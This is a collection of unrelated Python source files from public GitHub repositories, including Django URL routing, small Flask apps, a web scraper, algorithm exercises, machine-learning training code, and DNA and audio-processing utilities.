+{"seq_id":"74629294273","text":"from django.apps import apps\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.contrib.auth import views as auth_views\nfrom django.urls import include, path\nfrom django.views.i18n import JavaScriptCatalog\n\nimport calendarweek.django\nimport debug_toolbar\nfrom ckeditor_uploader import views as ckeditor_uploader_views\nfrom django_js_reverse.views import urls_js\nfrom health_check.urls import urlpatterns as health_urls\nfrom oauth2_provider.views import ConnectDiscoveryInfoView\nfrom rules.contrib.views import permission_required\nfrom two_factor.urls import urlpatterns as tf_urls\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", include(\"django_prometheus.urls\")),\n path(settings.MEDIA_URL.removeprefix(\"/\"), include(\"titofisto.urls\")),\n path(\"manifest.json\", views.ManifestView.as_view(), name=\"manifest\"),\n path(\"serviceworker.js\", views.ServiceWorkerView.as_view(), name=\"service_worker\"),\n path(\"offline/\", views.OfflineView.as_view(), name=\"offline\"),\n path(\"about/\", views.about, name=\"about_aleksis\"),\n path(\"accounts/signup/\", views.AccountRegisterView.as_view(), name=\"account_signup\"),\n path(\"accounts/logout/\", auth_views.LogoutView.as_view(), name=\"logout\"),\n path(\n \"accounts/password/change/\",\n views.CustomPasswordChangeView.as_view(),\n name=\"account_change_password\",\n ),\n path(\"accounts/\", include(\"allauth.urls\")),\n path(\"invitations/send-invite\", views.InvitePerson.as_view(), name=\"invite_person\"),\n path(\n \"invitations/code/enter\", views.EnterInvitationCode.as_view(), name=\"enter_invitation_code\"\n ),\n path(\n \"invitations/code/generate\",\n views.GenerateInvitationCode.as_view(),\n name=\"generate_invitation_code\",\n ),\n path(\"invitations/\", include(\"invitations.urls\")),\n path(\n \"accounts/social/connections//delete\",\n views.SocialAccountDeleteView.as_view(),\n name=\"delete_social_account_by_pk\",\n ),\n path(\"admin/\", admin.site.urls),\n path(\"admin/uwsgi/\", include(\"django_uwsgi.urls\")),\n path(\"data_management/\", views.data_management, name=\"data_management\"),\n path(\"status/\", views.SystemStatus.as_view(), name=\"system_status\"),\n path(\"account/login/\", views.LoginView.as_view(), name=\"login\"),\n path(\"\", include(tf_urls)),\n path(\"celery_progress//\", views.CeleryProgressView.as_view(), name=\"task_status\"),\n path(\"accounts/logout/\", auth_views.LogoutView.as_view(), name=\"logout\"),\n path(\"school_terms/\", views.SchoolTermListView.as_view(), name=\"school_terms\"),\n path(\"school_terms/create/\", views.SchoolTermCreateView.as_view(), name=\"create_school_term\"),\n path(\"school_terms//\", views.SchoolTermEditView.as_view(), name=\"edit_school_term\"),\n path(\"persons\", views.persons, name=\"persons\"),\n path(\"person/\", views.person, name=\"person\"),\n path(\"person/create/\", views.CreatePersonView.as_view(), name=\"create_person\"),\n path(\"person//\", views.person, name=\"person_by_id\"),\n path(\"person//edit/\", views.EditPersonView.as_view(), name=\"edit_person_by_id\"),\n path(\"person//delete/\", views.delete_person, name=\"delete_person_by_id\"),\n path(\"person//invite/\", views.InvitePersonByID.as_view(), name=\"invite_person_by_id\"),\n path(\"groups\", views.groups, name=\"groups\"),\n path(\"groups/additional_fields\", views.additional_fields, name=\"additional_fields\"),\n path(\"groups/child_groups/\", views.groups_child_groups, name=\"groups_child_groups\"),\n path(\n 
\"groups/additional_field//edit\",\n views.edit_additional_field,\n name=\"edit_additional_field_by_id\",\n ),\n path(\n \"groups/additional_field/create\",\n views.edit_additional_field,\n name=\"create_additional_field\",\n ),\n path(\n \"groups/additional_field//delete\",\n views.delete_additional_field,\n name=\"delete_additional_field_by_id\",\n ),\n path(\"group/create\", views.edit_group, name=\"create_group\"),\n path(\"group/\", views.group, name=\"group_by_id\"),\n path(\"group//edit\", views.edit_group, name=\"edit_group_by_id\"),\n path(\"group//delete\", views.delete_group, name=\"delete_group_by_id\"),\n path(\"\", views.index, name=\"index\"),\n path(\"notifications/\", views.NotificationsListView.as_view(), name=\"notifications\"),\n path(\"dashboard/edit/\", views.EditDashboardView.as_view(), name=\"edit_dashboard\"),\n path(\n \"notifications/mark-read/\",\n views.notification_mark_read,\n name=\"notification_mark_read\",\n ),\n path(\"groups/group_type/create\", views.edit_group_type, name=\"create_group_type\"),\n path(\n \"groups/group_type//delete\",\n views.delete_group_type,\n name=\"delete_group_type_by_id\",\n ),\n path(\"groups/group_type//edit\", views.edit_group_type, name=\"edit_group_type_by_id\"),\n path(\"groups/group_types\", views.group_types, name=\"group_types\"),\n path(\"announcements/\", views.announcements, name=\"announcements\"),\n path(\"announcement/create/\", views.announcement_form, name=\"add_announcement\"),\n path(\"announcement/edit//\", views.announcement_form, name=\"edit_announcement\"),\n path(\"announcement/delete//\", views.delete_announcement, name=\"delete_announcement\"),\n path(\"search/searchbar/\", views.searchbar_snippets, name=\"searchbar_snippets\"),\n path(\"search/\", views.PermissionSearchView.as_view(), name=\"haystack_search\"),\n path(\"maintenance-mode/\", include(\"maintenance_mode.urls\")),\n path(\"impersonate/\", include(\"impersonate.urls\")),\n path(\n \".well-known/openid-configuration\",\n ConnectDiscoveryInfoView.as_view(),\n name=\"oidc_configuration\",\n ),\n path(\"oauth/applications/\", views.OAuth2ListView.as_view(), name=\"oauth2_applications\"),\n path(\n \"oauth/applications/register/\",\n views.OAuth2RegisterView.as_view(),\n name=\"register_oauth_application\",\n ),\n path(\n \"oauth/applications//\", views.OAuth2DetailView.as_view(), name=\"oauth2_application\"\n ),\n path(\n \"oauth/applications//delete/\",\n views.OAuth2DeleteView.as_view(),\n name=\"delete_oauth2_application\",\n ),\n path(\n \"oauth/applications//edit/\",\n views.OAuth2EditView.as_view(),\n name=\"edit_oauth2_application\",\n ),\n path(\"oauth/\", include(\"oauth2_provider.urls\", namespace=\"oauth2_provider\")),\n path(\"__i18n__/\", include(\"django.conf.urls.i18n\")),\n path(\n \"ckeditor/upload/\",\n permission_required(\"core.ckeditor_upload_files_rule\")(ckeditor_uploader_views.upload),\n name=\"ckeditor_upload\",\n ),\n path(\n \"ckeditor/browse/\",\n permission_required(\"core.ckeditor_upload_files_rule\")(ckeditor_uploader_views.browse),\n name=\"ckeditor_browse\",\n ),\n path(\"select2/\", include(\"django_select2.urls\")),\n path(\"jsreverse.js\", urls_js, name=\"js_reverse\"),\n path(\"calendarweek_i18n.js\", calendarweek.django.i18n_js, name=\"calendarweek_i18n_js\"),\n path(\"gettext.js\", JavaScriptCatalog.as_view(), name=\"javascript-catalog\"),\n path(\n \"preferences/site/\", views.preferences, {\"registry_name\": \"site\"}, name=\"preferences_site\"\n ),\n path(\n \"preferences/person/\",\n 
views.preferences,\n {\"registry_name\": \"person\"},\n name=\"preferences_person\",\n ),\n path(\n \"preferences/group/\",\n views.preferences,\n {\"registry_name\": \"group\"},\n name=\"preferences_group\",\n ),\n path(\n \"preferences/site//\",\n views.preferences,\n {\"registry_name\": \"site\"},\n name=\"preferences_site\",\n ),\n path(\n \"preferences/person//\",\n views.preferences,\n {\"registry_name\": \"person\"},\n name=\"preferences_person\",\n ),\n path(\n \"preferences/group//\",\n views.preferences,\n {\"registry_name\": \"group\"},\n name=\"preferences_group\",\n ),\n path(\n \"preferences/site///\",\n views.preferences,\n {\"registry_name\": \"site\"},\n name=\"preferences_site\",\n ),\n path(\n \"preferences/person///\",\n views.preferences,\n {\"registry_name\": \"person\"},\n name=\"preferences_person\",\n ),\n path(\n \"preferences/group///\",\n views.preferences,\n {\"registry_name\": \"group\"},\n name=\"preferences_group\",\n ),\n path(\n \"preferences/site//\",\n views.preferences,\n {\"registry_name\": \"site\"},\n name=\"preferences_site\",\n ),\n path(\n \"preferences/person//\",\n views.preferences,\n {\"registry_name\": \"person\"},\n name=\"preferences_person\",\n ),\n path(\n \"preferences/group//\",\n views.preferences,\n {\"registry_name\": \"group\"},\n name=\"preferences_group\",\n ),\n path(\"health/\", include(health_urls)),\n path(\"health/pdf/\", views.TestPDFGenerationView.as_view(), name=\"test_pdf\"),\n path(\n \"data_check/\",\n views.DataCheckView.as_view(),\n name=\"check_data\",\n ),\n path(\n \"data_check/run/\",\n views.RunDataChecks.as_view(),\n name=\"data_check_run\",\n ),\n path(\n \"data_check///\",\n views.SolveDataCheckView.as_view(),\n name=\"data_check_solve\",\n ),\n path(\"dashboard_widgets/\", views.DashboardWidgetListView.as_view(), name=\"dashboard_widgets\"),\n path(\n \"dashboard_widgets//edit/\",\n views.DashboardWidgetEditView.as_view(),\n name=\"edit_dashboard_widget\",\n ),\n path(\n \"dashboard_widgets//delete/\",\n views.DashboardWidgetDeleteView.as_view(),\n name=\"delete_dashboard_widget\",\n ),\n path(\n \"dashboard_widgets///new/\",\n views.DashboardWidgetCreateView.as_view(),\n name=\"create_dashboard_widget\",\n ),\n path(\n \"dashboard_widgets/default/\",\n views.EditDashboardView.as_view(),\n {\"default\": True},\n name=\"edit_default_dashboard\",\n ),\n path(\n \"permissions/global/user/\",\n views.UserGlobalPermissionsListBaseView.as_view(),\n name=\"manage_user_global_permissions\",\n ),\n path(\n \"permissions/global/group/\",\n views.GroupGlobalPermissionsListBaseView.as_view(),\n name=\"manage_group_global_permissions\",\n ),\n path(\n \"permissions/object/user/\",\n views.UserObjectPermissionsListBaseView.as_view(),\n name=\"manage_user_object_permissions\",\n ),\n path(\n \"permissions/object/group/\",\n views.GroupObjectPermissionsListBaseView.as_view(),\n name=\"manage_group_object_permissions\",\n ),\n path(\n \"permissions/global/user//delete/\",\n views.UserGlobalPermissionDeleteView.as_view(),\n name=\"delete_user_global_permission\",\n ),\n path(\n \"permissions/global/group//delete/\",\n views.GroupGlobalPermissionDeleteView.as_view(),\n name=\"delete_group_global_permission\",\n ),\n path(\n \"permissions/object/user//delete/\",\n views.UserObjectPermissionDeleteView.as_view(),\n name=\"delete_user_object_permission\",\n ),\n path(\n \"permissions/object/group//delete/\",\n views.GroupObjectPermissionDeleteView.as_view(),\n name=\"delete_group_object_permission\",\n ),\n path(\n 
\"permissions/assign/\",\n views.SelectPermissionForAssignView.as_view(),\n name=\"select_permission_for_assign\",\n ),\n path(\n \"permissions//assign/\",\n views.AssignPermissionView.as_view(),\n name=\"assign_permission\",\n ),\n path(\"pdfs//\", views.RedirectToPDFFile.as_view(), name=\"redirect_to_pdf_file\"),\n]\n\n# Use custom server error handler to get a request object in the template\nhandler500 = views.server_error\n\n# Add URLs for optional features\nif hasattr(settings, \"TWILIO_ACCOUNT_SID\"):\n from two_factor.gateways.twilio.urls import urlpatterns as tf_twilio_urls # noqa\n\n urlpatterns += [path(\"\", include(tf_twilio_urls))]\n\n# Serve javascript-common if in development\nif settings.DEBUG:\n urlpatterns.append(path(\"__debug__/\", include(debug_toolbar.urls)))\n\n# Automatically mount URLs from all installed AlekSIS apps\nfor app_config in apps.app_configs.values():\n if not app_config.name.startswith(\"aleksis.apps.\"):\n continue\n\n try:\n urlpatterns.append(path(f\"app/{app_config.label}/\", include(f\"{app_config.name}.urls\")))\n except ModuleNotFoundError:\n # Ignore exception as app just has no URLs\n pass # noqa\n","repo_name":"deepanshumehtaa/AlekSIS-Core","sub_path":"aleksis/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":12823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"31282285905","text":"from flask import Flask, redirect, render_template, url_for, request, session\nfrom client import Client\n\nNAME_KEY = 'name'\n\napp = Flask(__name__)\napp.secret_key = \"helloasdgf\"\n\n\n@app.route(\"/login\", methods=[\"POST\", \"GET\"])\ndef login():\n if request.method == \"POST\":\n print(request.form)\n session[NAME_KEY] = request.form[\"inputName\"]\n return redirect(url_for(\"home\"))\n return render_template(\"login.html\", **{\"session\":\"session\"})\n\n\n@app.route(\"/logout\")\ndef logout():\n session.pop(NAME_KEY, None)\n return redirect(url_for(\"login\"))\n\n\n@app.route(\"/\")\n@app.route(\"/home\")\ndef home():\n if NAME_KEY not in session:\n return redirect(url_for(\"login\"))\n\n return render_template(\"index.html\", **{\"login\":True, \"session\":session})\n\n\n@app.route(\"/run\")\ndef run():\n print(\"clicked\")\n return \"none\"\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"Jennifer331/Scripts","sub_path":"Chat App/website/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"23389971296","text":"import bs4, requests\r\n\r\ndef getUrlAuthor(nameUrl):\r\n res=requests.get(nameUrl)\r\n res.raise_for_status()\r\n\r\n soup=bs4.BeautifulSoup(res.text, 'html.parser')\r\n elems= soup.select('body > table > tbody > tr > td:nth-child(2) > p:nth-child(8) > a:nth-child(4)')\r\n return elems[0].text.strip() #listindexoutofrange #lesson40 in videos\r\n\r\nname= getUrlAuthor('http://dr-chuck.com/')\r\nprint('the author\\'s name is '+name)\r\n","repo_name":"valik94/MyPythonScripts","sub_path":"HTMLParserBS4Example.py","file_name":"HTMLParserBS4Example.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23407442848","text":"\"\"\" PROBLEM\n\tSearch in a 2D sorted array\n\n\tWAP to if a number exists in a 2D sorted array.\n\n\"\"\"\n\n\"\"\" SOLUTION\n\tStart from the top right corner. This eleminates a row and a column together \n\tin every comparison.\n\tT.C.: O(m+n)\n\n\"\"\"\n\ndef matrix_search(A, num):\n\trow, col = 0, len(A[0]) - 1\n\n\twhile row < len(A) and col >= 0:\n\t\tif A[row][col] == num:\n\t\t\treturn True\n\t\telif A[row][col] < num:\n\t\t\t# eliminate the row\n\t\t\trow += 1\n\t\telse:\n\t\t\t# eliminate the column\n\t\t\tcol -= 1\n\n\treturn False\n\n\nA = [[-1,2,4,4,6], [1,5,5,9,21], [3,6,6,9,22], [3,6,8,10,24], [6,8,9,12,25], [8,10,12,13,40]]\nnum = 8\nprint(\"Matrix: {}\".format(A))\nprint(\"{} is present in the matrix: {}\".format(num, matrix_search(A, num)))\n","repo_name":"sheelabhadra/Elements-Programming-Interviews","sub_path":"Searching/search_2D.py","file_name":"search_2D.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"36946678154","text":"'''\r\nCreated on Dec 18, 2016\r\n\r\n@author: Yuehan\r\n'''\r\nimport math\r\nclass Solution(object):\r\n def trailingZeroes(self, n):\r\n '''return 0 if n == 0 else int(n / 5 + Solution.trailingZeroes(self,n / 5))'''\r\n \r\n if (n==0):\r\n return 0\r\n digts=math.floor(math.log(n)/math.log(5))\r\n a=0;\r\n result=0;\r\n while (digts):\r\n a=math.floor(n/(5**digts))-math.floor(n/(5**(digts+1)))\r\n result=result+a*digts\r\n digts=digts-1\r\n return int(result)\r\n \r\n\r\nprint(Solution.trailingZeroes(0,200))\r\n","repo_name":"yuehanlyu/Leetcode_git","sub_path":"leetcode/L172_FactorialTrailingZeroes.py","file_name":"L172_FactorialTrailingZeroes.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"5344552772","text":"import numpy as np\nfrom tensorflow import keras\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Activation\nfrom tensorflow.keras.optimizers import SGD\nfrom tensorflow.keras.metrics import Precision, Recall\n\n\nclass Baseline():\n \n def __init__(self):\n self.classes_ = None\n self.classes_inverse_ = None\n self.means_ = None\n self.mean_dict = None\n self.label_dict = None\n \n def predict(self, X):\n predicts = []\n self.label_dict = {num:label for num,label in zip(np.arange(len(self.classes_)), self.classes_)}\n\n # Calculate and store closest class spectral vector for each data sample\n for sample in X:\n mean_index = np.argmin([np.sqrt(sum((sample - mean_vector)**2)) for mean_vector in self.mean_dict.values()])\n predicts.append(self.label_dict[mean_index])\n\n return np.array(predicts)\n \n def fit(self, X_train, y_train):\n self.classes_, self.classes_inverse_ = np.unique(y_train, return_inverse=True)\n self.means_ = [np.mean(X_train[self.classes_inverse_==idx,:], axis=0) for idx,label in enumerate(self.classes_)]\n self.mean_dict = {label: self.means_[i] for i,label in enumerate(self.classes_)}\n\ndef create_model(X, n_classes, n_hidden=3, opt='Adam', hidden_units=100, drop_out=0, activ='sigmoid'):\n '''Create a deep neural network model\n \n Parameters\n ----------\n X: array\n X data that will be used to train the network\n n_classes: int\n Number of classes to predict\n n_hidden: int\n Number of hidden layers\n opt: keras optimizer object\n Optimizer to use with neural network\n hidden_units: int\n Number of hidden units to use in the hidden layers\n drop_out: float\n dropout rate\n activ: str\n Activation function for hidden layer units\n\n Returns\n -------\n model: keras model object\n A compiled model\n '''\n np.random.seed(42)\n\n n_samples, n_feats = X.shape # Get shape of input data to construct network\n\n model = Sequential() \n\n hidden_layer = Dense(units=hidden_units,\n input_dim=n_feats,\n kernel_initializer='constant',\n activation='softsign')\n\n # Add first hidden layer, if required\n if n_hidden>0:\n model.add(Dense(units=hidden_units,\n input_dim=n_feats,\n kernel_initializer='uniform',\n activation=activ))\n #model.add(Dropout(drop_out))\n else:\n hidden_units=n_feats\n\n # Define output layer\n outputlayer = Dense(units=n_classes,\n input_dim=hidden_units,\n kernel_initializer='uniform',\n activation='softmax')\n\n # Add hidden layers to model, if required\n if n_hidden>1:\n for _ in np.arange(1,n_hidden):\n model.add(Dense(units=hidden_units,\n kernel_initializer='uniform',\n activation=activ))\n #model.add(Dropout(drop_out))\n\n # Add output layer \n model.add(outputlayer)\n\n # Compile model\n model.compile(loss='categorical_crossentropy', \n optimizer=opt, metrics=[\"accuracy\"])\n return model","repo_name":"jstodd867/landsat-classification","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"39073922076","text":"import requests\nfrom flask import Flask, url_for, request, render_template\napp = Flask(__name__) \nURL_BASE=\"https://swapi.co/api/\"\n\n@app.route('/')\ndef inicio():\n return render_template(\"index.html\")\n\n@app.route('/peliculas/')\ndef peliculas():\n\tr=requests.get(URL_BASE+'films/')\n\tif r.status_code == 200:\n\t\tdoc = r.json() \n\t\treturn render_template(\"peliculas.html\",datos=doc[\"results\"])\n\t\t\t\n@app.route('/peliculas/')\ndef peliculas_detalle(id):\n\tr=requests.get(URL_BASE+'films/%d'%id)\n\tif r.status_code == 200:\n\t\tdoc = r.json() \n\t\treturn render_template(\"peliculas_detalle.html\",datos=doc,id=id)\n\n@app.route('/peliculas//personajes')\ndef peliculas_personajes(id):\n\tr=requests.get(URL_BASE+'films/%d'%id)\n\tif r.status_code == 200:\n\t\tdoc = r.json() \n\t\turl_personajes=doc[\"characters\"]\n\t\tpersonajes=[]\n\t\tfor url_personaje in url_personajes:\n\t\t\tr=requests.get(url_personaje)\n\t\t\tif r.status_code == 200:\n\t\t\t\tdoc2=r.json()\n\t\t\t\tpersonajes.append(doc2[\"name\"])\n\n\t\treturn render_template(\"lista.html\",datos=zip(personajes,url_personajes),id=id,title=doc[\"title\"],subtitle=\"Personajes\",url_return=\"peliculas_detalle\")\n \n@app.route('/peliculas//planetas')\ndef peliculas_planetas(id):\n\tr=requests.get(URL_BASE+'films/%d'%id)\n\tif r.status_code == 200:\n\t\tdoc = r.json() \n\t\turl_planetas=doc[\"planets\"]\n\t\tplanetas=[]\n\t\tfor url_personaje in url_planetas:\n\t\t\tr=requests.get(url_personaje)\n\t\t\tif r.status_code == 200:\n\t\t\t\tdoc2=r.json()\n\t\t\t\tplanetas.append(doc2[\"name\"])\n\n\t\treturn render_template(\"lista.html\",datos=zip(planetas,url_planetas),id=id,title=doc[\"title\"],subtitle=\"Planetas\",url_return=\"peliculas_detalle\")\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"josedom24/swapi_examples","sub_path":"flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27227850721","text":"from Bio.SeqRecord import SeqRecord\nfrom dnachisel.Specification.SpecificationSet import SpecificationSet\nfrom dnachisel.DnaOptimizationProblem.mixins import ConstraintsSolverMixin\nfrom dnachisel.MutationSpace import MutationSpace\n\n\nclass DnaDesignProblem(\n ConstraintsSolverMixin,\n \n ):\n\n def __init__(\n self,\n sequence,\n constraints=None,\n mutation_space=None,\n # tailor args\n design_space = None,\n solution_id = None,\n parent=None):\n\n if isinstance(sequence, SeqRecord):\n self.record = sequence\n self.sequence = str(sequence.seq).upper()\n else:\n self.record = None\n self.sequence = sequence.upper()\n self.constraints = [] if constraints is None else list(constraints)\n self.mutation_space = mutation_space\n\n self.design_space = design_space\n self.solution_id = solution_id\n self.parent = parent\n\n self.scores = {}\n self.levels = {}\n\n self.initialize()\n \n def _set_scores(self):\n for i in range(len(self.design_space.feature_label)):\n self.scores[self.design_space.feature_label[i]] = self.design_space.feature_specification[i].evaluate(self).score\n \n def _set_level(self):\n for i in range(len(self.design_space.feature_label)):\n feature_label = self.design_space.feature_label[i]\n self.levels[feature_label + \"_Level\"] = self.design_space.range_set_list[i].get_level(self.scores[feature_label])\n\n \n \n def initialize(self):\n\n # for specs in self.constraints:\n specsets = [\n spec for spec in self.constraints if isinstance(spec, SpecificationSet)\n ]\n specs_in_sets = [\n spec\n for specset in specsets\n for spec in specset.specifications.values()\n ]\n for specset in specsets:\n self.constraints.remove(specset)\n self.constraints.extend(specs_in_sets)\n\n # INITIALIZE THE CONSTRAINTS AND OBJECTIVES\n\n self.constraints = [\n constraint.initialized_on_problem(self, role=\"constraint\")\n for constraint in self.constraints\n ]\n\n self.sequence_before = self.sequence\n self._constraints_before = None\n self._objectives_before = None\n\n # INITIALIZE THE MUTATION SPACE\n\n if self.mutation_space is None:\n self.mutation_space = MutationSpace.from_optimization_problem(self)\n # If the original sequence is outside of the allowed mutations\n # space, replace the sequence by a sequence which complies with\n # the mutation space.\n self.sequence = self.mutation_space.constrain_sequence(\n self.sequence\n )\n \n self._set_scores()\n self._set_level()\n\n\n def is_match_design(self,desired_design):\n levels = [\n str(self.levels[feature+'_Level']) \n for feature in self.design_space.feature_label\n ]\n\n return '.'.join(levels) == desired_design","repo_name":"HealthCodon/dnachisel_dtailor_mode","sub_path":"dnachisel_dtailor_mode/DnaDesignProblem.py","file_name":"DnaDesignProblem.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"573375091","text":"import os\r\n\r\nimport torch\r\nfrom tqdm import tqdm\r\n\r\nfrom utils.utils import get_lr\r\n\r\n\r\ndef fit_one_epoch(model_train, model, multi_loss, loss_history, optimizer, epoch, epoch_step, epoch_step_val, gen, gen_val, Epoch, cuda, fp16, scaler, save_period, save_dir, local_rank=0):\r\n total_loss = 0\r\n val_loss = 0\r\n\r\n if local_rank == 0:\r\n print('Start Train')\r\n pbar = tqdm(total=epoch_step,desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3)\r\n model_train.train()\r\n for iteration, batch in enumerate(gen):\r\n if iteration >= epoch_step:\r\n break\r\n images, targets, masks_gt, num_crowds = batch[0], batch[1], batch[2], batch[3]\r\n with torch.no_grad():\r\n if cuda:\r\n images = images.cuda(local_rank)\r\n targets = [ann.cuda(local_rank) for ann in targets]\r\n masks_gt = [mask.cuda(local_rank) for mask in masks_gt]\r\n #----------------------#\r\n # 清零梯度\r\n #----------------------#\r\n optimizer.zero_grad()\r\n if not fp16:\r\n #----------------------#\r\n # 前向传播\r\n #----------------------#\r\n outputs = model_train(images)\r\n #----------------------#\r\n # 计算损失\r\n #----------------------#\r\n losses = multi_loss(outputs, targets, masks_gt, num_crowds)\r\n losses = {k: v.mean() for k, v in losses.items()} # Mean here because Dataparallel.\r\n loss = sum([losses[k] for k in losses])\r\n\r\n #----------------------#\r\n # 反向传播\r\n #----------------------#\r\n loss.backward()\r\n optimizer.step()\r\n else:\r\n from torch.cuda.amp import autocast\r\n with autocast():\r\n #----------------------#\r\n # 前向传播\r\n #----------------------#\r\n outputs = model_train(images)\r\n #----------------------#\r\n # 计算损失\r\n #----------------------#\r\n losses = multi_loss(outputs, targets, masks_gt, num_crowds)\r\n losses = {k: v.mean() for k, v in losses.items()} # Mean here because Dataparallel.\r\n loss = sum([losses[k] for k in losses])\r\n\r\n #----------------------#\r\n # 反向传播\r\n #----------------------#\r\n scaler.scale(loss).backward()\r\n scaler.step(optimizer)\r\n scaler.update()\r\n \r\n total_loss += loss.item()\r\n \r\n if local_rank == 0:\r\n pbar.set_postfix(**{'total_loss': total_loss / (iteration + 1), \r\n 'lr' : get_lr(optimizer)})\r\n pbar.update(1)\r\n\r\n if local_rank == 0:\r\n pbar.close()\r\n print('Finish Train')\r\n print('Start Validation')\r\n pbar = tqdm(total=epoch_step_val, desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3)\r\n\r\n model_train.eval()\r\n for iteration, batch in enumerate(gen_val):\r\n if iteration >= epoch_step_val:\r\n break\r\n images, targets, masks_gt, num_crowds = batch[0], batch[1], batch[2], batch[3]\r\n with torch.no_grad():\r\n if cuda:\r\n images = images.cuda(local_rank)\r\n targets = [ann.cuda(local_rank) for ann in targets]\r\n masks_gt = [mask.cuda(local_rank) for mask in masks_gt]\r\n\r\n optimizer.zero_grad()\r\n #----------------------#\r\n # 前向传播\r\n #----------------------#\r\n outputs = model_train(images)\r\n #----------------------#\r\n # 计算损失\r\n #----------------------#\r\n losses = multi_loss(outputs, targets, masks_gt, num_crowds)\r\n losses = {k: v.mean() for k, v in losses.items()}\r\n loss = sum([losses[k] for k in losses])\r\n\r\n val_loss += loss.item()\r\n \r\n if local_rank == 0:\r\n pbar.set_postfix(**{'val_loss': val_loss / (iteration + 1), \r\n 'lr' : get_lr(optimizer)})\r\n pbar.update(1)\r\n\r\n if local_rank == 0:\r\n pbar.close()\r\n print('Finish Validation')\r\n loss_history.append_loss(epoch + 1, total_loss / epoch_step, val_loss 
/ epoch_step_val)\r\n print('Epoch:'+ str(epoch+1) + '/' + str(Epoch))\r\n print('Total Loss: %.3f || Val Loss: %.3f ' % (total_loss / epoch_step, val_loss / epoch_step_val))\r\n \r\n #-----------------------------------------------#\r\n # 保存权值\r\n #-----------------------------------------------#\r\n if (epoch + 1) % save_period == 0 or epoch + 1 == Epoch:\r\n torch.save(model.state_dict(), os.path.join(save_dir, 'ep%03d-loss%.3f-val_loss%.3f.pth' % (epoch + 1, total_loss / epoch_step, val_loss / epoch_step_val)))\r\n \r\n if len(loss_history.val_loss) <= 1 or (val_loss / epoch_step_val) <= min(loss_history.val_loss):\r\n print('Save best model to best_epoch_weights.pth')\r\n torch.save(model.state_dict(), os.path.join(save_dir, \"best_epoch_weights.pth\"))\r\n \r\n torch.save(model.state_dict(), os.path.join(save_dir, \"last_epoch_weights.pth\"))\r\n","repo_name":"bubbliiiing/yolact-pytorch","sub_path":"utils/utils_fit.py","file_name":"utils_fit.py","file_ext":"py","file_size_in_byte":5427,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"61"}
+{"seq_id":"43939583255","text":"import threading\nfrom queue import Queue\n\n\n# 定义生产者函数\ndef producer(queue, items):\n for item in items:\n # 生产者向队列中放入数据\n queue.put(item)\n\n\n# 定义消费者函数\ndef consumer(queue):\n while True:\n item = queue.get()\n # 消费者从队列中取出数据并进行处理\n print(\"Consumed:\", item)\n queue.task_done()\n\n\n# 创建队列\nqueue = Queue()\n\n# 创建生产者线程并启动\nproducer_thread = threading.Thread(target=producer, args=(queue, [1, 2, 3, 4, 5]))\nproducer_thread.start()\n\n# 创建消费者线程并启动\nconsumer_thread = threading.Thread(target=consumer, args=(queue,))\nconsumer_thread.start()\n\n# 阻塞主线程,等待队列中的任务完成\nqueue.join()\n\n# 输出:\n# Consumed: 1\n# Consumed: 2\n# Consumed: 3\n# Consumed: 4\n# Consumed: 5\n","repo_name":"showyouhappiness/Python_study","sub_path":"并发/多线程与队列/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"374159006","text":"from adaptft.tft import TFTransformer\nimport numpy as np\nimport matplotlib.pyplot as plt\n\naudio_path = \"/home/rejinal/Datasets/SAFE/VJRS_05_062.08.wav\"\n\nTFT = TFTransformer(audio_path)\nsst = np.asarray([i for i in TFT.compute_sst()])\nscaled_sst = np.log(1 + sst ** 2.0)\n\n# Get rid of the channel axis\nscaled_sst = np.reshape(scaled_sst, [scaled_sst.shape[0], scaled_sst.shape[2]])\n\nplt.pcolormesh(scaled_sst.T, cmap=\"Greys\")\nplt.show()\ninput(\"Press ENTER to finish\")","repo_name":"alexberrian/AdapTFT","sub_path":"tests/test_sst.py","file_name":"test_sst.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
